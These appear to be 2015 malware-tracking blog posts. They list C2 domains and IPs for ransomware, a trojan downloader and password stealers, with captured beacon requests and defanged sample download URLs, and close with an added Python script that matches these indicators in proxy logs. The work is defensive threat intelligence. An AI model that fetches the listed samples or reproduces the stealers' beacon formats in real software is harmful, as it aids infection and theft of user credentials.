Month: October 2015

qbstdn6k7iivyki2.onion (Lending Ransomware Hosted In France, Roubaix, OVH SAS)

The ransomware's command-and-control panel is a Tor hidden service (qbstdn6k7iivyki2.onion). The sample does not speak Tor itself: it reaches the panel over plain HTTP on port 80 through the onion.direct Tor2web gateway, so the address below (OVH, Roubaix, France) belongs to the gateway, not to the hidden service behind it.

Domain                          Address          Country
qbstdn6k7iivyki2.onion.direct   5.135.181.100    France

HTTP requests:

5.135.181.100:80 (qbstdn6k7iivyki2.onion.direct)
GET /lending/bot.php?name=4m4qn8F4804DA9-83EC&kod=tFpJtvsF^lUPeqDDzAQnkOeFfH]zSstunSA[dotBceHrJvZpTz&pid=2

Raw request:

GET /lending/bot.php?name=4m4qn8F4804DA9-83EC&kod=tFpJtvsF^lUPeqDDzAQnkOeFfH]zSstunSA[dotBceHrJvZpTz&pid=2 HTTP/1.1
Host: qbstdn6k7iivyki2.onion.direct
Keep-Alive: 300
Connection: keep-alive
User-Agent: Mozilla/4.0 (compatible; Synapse)

Note the User-Agent: "Mozilla/4.0 (compatible; Synapse)" is the default string sent by the Synapse TCP/IP library for Delphi/Free Pascal, which no real browser uses. Together with the /lending/bot.php path and the name=/kod=/pid= check-in parameters it makes a usable network signature for this bot.

Trojan Downloader Hosted In 66 Different IPs

This sample contains a trojan downloader: hxxp://193.28.179.40/loader/harsh02.exe (around 1 MB in size).

Hosts list:

94.153.127.132
41.38.71.138
94.254.52.140
46.149.62.141
123.28.95.142
134.17.160.109
178.129.117.110
85.17.31.111
91.246.240.111
5.105.31.117
77.123.167.4
95.65.55.6
178.151.65.6
176.116.194.6
82.211.132.7
180.176.214.13
46.118.178.14
95.76.169.18
5.105.39.19
176.37.119.19
211.120.158.247
46.118.63.248
91.123.153.248
213.111.223.250
27.2.103.254
106.242.117.85
5.105.56.87
117.40.213.89
77.122.167.93
81.198.206.95
173.240.15.54
46.119.56.56
145.249.166.60
77.121.186.60
89.43.129.64
78.139.185.21
176.8.198.22
89.41.38.24
73.38.63.24
182.234.149.25
91.209.96.3
93.79.182.11

indianmoneybag.in (HTTP Password Stealer Hosted In United States, Provo, Unified Layer)

Possibly a Zeus variant.

Domains:

repository.certum.pl              213.222.201.175
www.download.windowsupdate.com    184.25.56.173
crl.certum.pl                     213.222.201.210
myworkmustpayme.xyz               162.144.218.223
www.indianmoneybag.in             104.153.45.242
joemb009i.xyz                     162.144.218.223
cryfreeman042.ddns.net            41.138.167.135

The Certum entries (a Polish CA's repository and CRL) and www.download.windowsupdate.com are legitimate endpoints contacted for certificate and revocation checks; they appear in the capture but are not indicators and should not be blocked. The sample's own infrastructure is www.indianmoneybag.in (the gate), myworkmustpayme.xyz and joemb009i.xyz (same IP, configuration download) and cryfreeman042.ddns.net. The gate and config paths sit under WordPress directories (wp-content/themes, wp-admin), which points to compromised WordPress installations rather than dedicated servers.

HTTP requests:

http://www.indianmoneybag.in/wp-content/themes/twentyfourteen/css/php/gate.php

POST /wp-content/themes/twentyfourteen/css/php/gate.php HTTP/1.0
Host: www.indianmoneybag.in
Accept: */*
Accept-Encoding: identity, *;q=0
Content-Length: 506
Connection: close
Content-Type: application/octet-stream
Content-Encoding: binary
User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)

http://myworkmustpayme.xyz/wp-admin/css/panel/config.jpg

GET /wp-admin/css/panel/config.jpg HTTP/1.1
Accept: */*
Connection:

The hard-coded "MSIE 5.0; Windows 98" User-Agent is implausible for a 2015 host and is a second network signature alongside the gate.php POST with a binary body.

pltd.myjino.ru (HTTP Malware Hosted In Russian Federation, Moscow, Avguro Technologies Ltd. Hosting Service Provider)

Domain name:

pltd.myjino.ru    81.177.140.144

HTTP requests:

http://pltd.myjino.ru/finsess.php

Data:

POST /finsess.php HTTP/1.0
Host: pltd.myjino.ru
Connection: close
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US)
Content-Type: application/x-www-form-urlencoded
Content-Length: 26

1=1882869218&2=&3=&99=15&^

Get sample here: hxxp://93.95.99.172/0310_crypted.exe

Hosting info: http://whois.domaintools.com/81.177.140.144

righromonhen.ru (HTTP Trojan Password Stealer Hosted In Russian Federation, Miragroup Ltd.)

Domains:

righromonhen.ru             93.171.202.172
www.peak-exposure.co.uk     174.136.12.119
www.depalmaelocatelli.it    62.149.140.139

HTTP requests:

hxxp://www.peak-exposure.co.uk/wp-content/plugins/cached_data/k1.exe
hxxp://righromonhen.ru/gate.php
hxxp://www.depalmaelocatelli.it/wp-content/plugins/cached_data/k1.exe

The same k1.exe is served from the same wp-content/plugins/cached_data/ path on two unrelated WordPress sites, which is typical of compromised hosts used as payload mirrors; righromonhen.ru, which receives the gate.php traffic, is the actual C2.

Hosting info: http://whois.domaintools.com/93.171.202.172
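The posts above document recurring HTTP beacon shapes (gate.php and finsess.php POSTs, the /lending/bot.php check-in with name/kod/pid, executables dropped under wp-content/plugins/cached_data/, and two hard-coded User-Agents). The following script is an added example, not part of the original blog: it turns those observations into matching logic and runs it over a constructed, simplified proxy log (client, method, URL, quoted User-Agent), including benign Certum CRL traffic to show that it is not flagged. The log format, client addresses and the shortened kod= value are assumptions made for the example.

```python
"""Match the HTTP beacon patterns catalogued above against proxy log lines.

Added example, not part of the original blog posts. The log format is a
constructed, simplified proxy log: <client_ip> <method> <url> "<user-agent>".
"""
import re
from urllib.parse import urlsplit, parse_qs

# Hostnames taken from the posts above; matched exactly.
C2_HOSTS = {
    "qbstdn6k7iivyki2.onion.direct",
    "www.indianmoneybag.in",
    "myworkmustpayme.xyz",
    "pltd.myjino.ru",
    "righromonhen.ru",
}
# Paths are matched by regex so the same C2 script on another domain still alerts.
PATH_PATTERNS = {
    "lending_bot_checkin": re.compile(r"/lending/bot\.php$"),
    "gate_php_post": re.compile(r"/gate\.php$"),
    "finsess_post": re.compile(r"/finsess\.php$"),
    "dropped_exe_in_wp_plugins": re.compile(r"/wp-content/plugins/cached_data/.*\.exe$"),
}
# User-Agents seen in the captures: the Synapse library default, and an
# implausible MSIE 5.0 / Windows 98 string hard-coded into the stealer.
SUSPECT_UAS = (
    "Mozilla/4.0 (compatible; Synapse)",
    "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)",
)

LOG_RE = re.compile(r'^(\S+) (\S+) (\S+) "([^"]*)"$')


def classify(line):
    """Return a sorted list of indicator names hit by one log line ([] if clean)."""
    m = LOG_RE.match(line.strip())
    if not m:
        return []
    _client, _method, url, ua = m.groups()
    parts = urlsplit(url)
    hits = []
    if parts.hostname in C2_HOSTS:
        hits.append("known_c2_host")
    for name, pat in PATH_PATTERNS.items():
        if pat.search(parts.path):
            hits.append(name)
    if ua in SUSPECT_UAS:
        hits.append("hardcoded_ua")
    # The /lending/bot.php beacon carries name=, kod= and pid=; require all
    # three so an unrelated bot.php does not alert on the path alone.
    if parts.path.endswith("/lending/bot.php"):
        if {"name", "kod", "pid"} <= set(parse_qs(parts.query)):
            hits.append("lending_beacon_params")
    return sorted(hits)


def scan(lines):
    """Map each alerting line to its indicator names; clean lines are omitted."""
    return {ln: h for ln in lines if (h := classify(ln))}


# Constructed sample log (not a real capture). The first four lines echo the
# requests documented above; the last two are benign traffic that must not alert.
SAMPLE_LOG = [
    '10.0.0.5 GET http://qbstdn6k7iivyki2.onion.direct/lending/bot.php?name=4m4qn8F4804DA9-83EC&kod=abc&pid=2 "Mozilla/4.0 (compatible; Synapse)"',
    '10.0.0.7 POST http://www.indianmoneybag.in/wp-content/themes/twentyfourteen/css/php/gate.php "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)"',
    '10.0.0.7 POST http://pltd.myjino.ru/finsess.php "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US)"',
    '10.0.0.9 GET http://www.peak-exposure.co.uk/wp-content/plugins/cached_data/k1.exe "Mozilla/5.0"',
    '10.0.0.5 GET http://crl.certum.pl/ca.crl "Microsoft-CryptoAPI/6.1"',
    '10.0.0.9 GET http://example.com/index.php?name=x&pid=2 "Mozilla/5.0"',
]

if __name__ == "__main__":
    for line, hits in scan(SAMPLE_LOG).items():
        print(",".join(hits), "<-", line[:90])
```

Host matches are kept separate from path and User-Agent matches on purpose: the hostnames rotate quickly (the k1.exe mirrors and the .xyz config hosts are compromised or throwaway), while the script names and the hard-coded User-Agents change far less often, so a line that hits only a path or UA rule is still worth a look.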